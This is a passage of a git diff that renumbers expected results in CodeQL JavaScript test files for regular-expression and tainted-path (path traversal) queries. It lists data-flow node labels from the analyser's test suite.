b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | 
diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..bfb374411b6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected 
@@ -4,159 +4,159 @@ nodes | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | | TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | | TaintedPath.js:9:7:9:48 | path | semmle.label | path | | TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | | TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... 
e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... 
).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... 
, true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... 
l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... 
, path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... 
c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... 
, true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... 
l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | | examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | | examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | | express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | | handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | | handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | 
@@ -440,22 +440,22 @@ nodes | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | | tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | | tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... 
rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | 
@@ -504,158 +504,158 @@ nodes | typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| 